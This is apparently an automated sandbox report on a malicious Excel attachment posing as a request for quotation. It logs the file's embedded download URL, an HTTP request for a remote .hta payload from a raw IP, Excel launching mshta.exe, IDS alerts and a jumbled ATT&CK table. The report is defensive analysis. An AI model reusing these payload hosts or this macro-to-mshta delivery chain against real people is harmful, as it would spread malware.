Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49702
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49702
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49702
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49701 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49702 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficHTTP traffic detected: GET /3yRDYq?&balance=tested&cleaner HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownTCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /3yRDYq?&balance=tested&cleaner HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6a8babc50d5d255e HTTP/1.1Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 05 Dec 2024 19:42:09 GMTIf-None-Match: "06cfcc54d47db1:0"User-Agent: Microsoft-CryptoAPI/10.0Host: ctldl.windowsupdate.com
Source: global trafficHTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?526cae6927517da1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: ctldl.windowsupdate.com
Source: global trafficHTTP traffic detected: GET /xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 217.154.55.185
Source: global trafficDNS traffic detected: DNS query: t.emobility.energy
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx, F4B20000.0.drString found in binary or memory: https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.9:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.9:49701 version: TLS 1.2

System Summary

barindex
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DF47F8F0D42EFF3FED.TMP.0.drOLE: Microsoft Excel 2007+
Source: F4B20000.0.drOLE: Microsoft Excel 2007+
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxOLE indicator, VBA macros: true
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxStream path 'MBD00356DE1/\x1Ole' : https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&FJTEliEOp>9[ih<)c=AF$k.l#2K!/k@V7vGE96HjTL9gDbIc6jciN6ZJDg60xlZsFkd6BjIQtdi6QXmh75ZsfEDzOgNFwgtZwjWR5IWiaO6QUIEzexmXovQxLdAHFrqo80t4SemnyScNBQJL9msT6diKjIoCrrFKjQ6nKsNseCQYmn5KuseZIAMtwvlKFmXNTgLQ4PL9srKmsRNpBK0gVc5uIXZnIjuj0DHsY3S72UlmbpkX8u9eBKZFyH7yAOCjvGX1we2oFu5A.)RtrYQZK
Source: F4B20000.0.drStream path 'MBD00356DE1/\x1Ole' : https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&FJTEliEOp>9[ih<)c=AF$k.l#2K!/k@V7vGE96HjTL9gDbIc6jciN6ZJDg60xlZsFkd6BjIQtdi6QXmh75ZsfEDzOgNFwgtZwjWR5IWiaO6QUIEzexmXovQxLdAHFrqo80t4SemnyScNBQJL9msT6diKjIoCrrFKjQ6nKsNseCQYmn5KuseZIAMtwvlKFmXNTgLQ4PL9srKmsRNpBK0gVc5uIXZnIjuj0DHsY3S72UlmbpkX8u9eBKZFyH7yAOCjvGX1we2oFu5A.)RtrYQZK
Source: ~DF47F8F0D42EFF3FED.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'enquiry - rfq 674441-76450.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/9@2/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ENQUIRY - RFQ 674441-76450.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{46B76D48-6942-4512-9975-9C110794EC42} - OProcSessId.datJump to behavior
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxOLE indicator, Workbook stream: true
Source: F4B20000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxVirustotal: Detection: 27%
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxReversingLabs: Detection: 27%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxStatic file information: File size 1304064 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF47F8F0D42EFF3FED.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxStream path 'MBD00356DE0/Package' entropy: 7.97779971333 (max. 8.0)
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxStream path 'Workbook' entropy: 7.99942891107 (max. 8.0)
Source: ~DF47F8F0D42EFF3FED.TMP.0.drStream path 'Package' entropy: 7.97113385116 (max. 8.0)
Source: F4B20000.0.drStream path 'MBD00356DE0/Package' entropy: 7.97113385116 (max. 8.0)
Source: F4B20000.0.drStream path 'Workbook' entropy: 7.9995949109 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 938Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
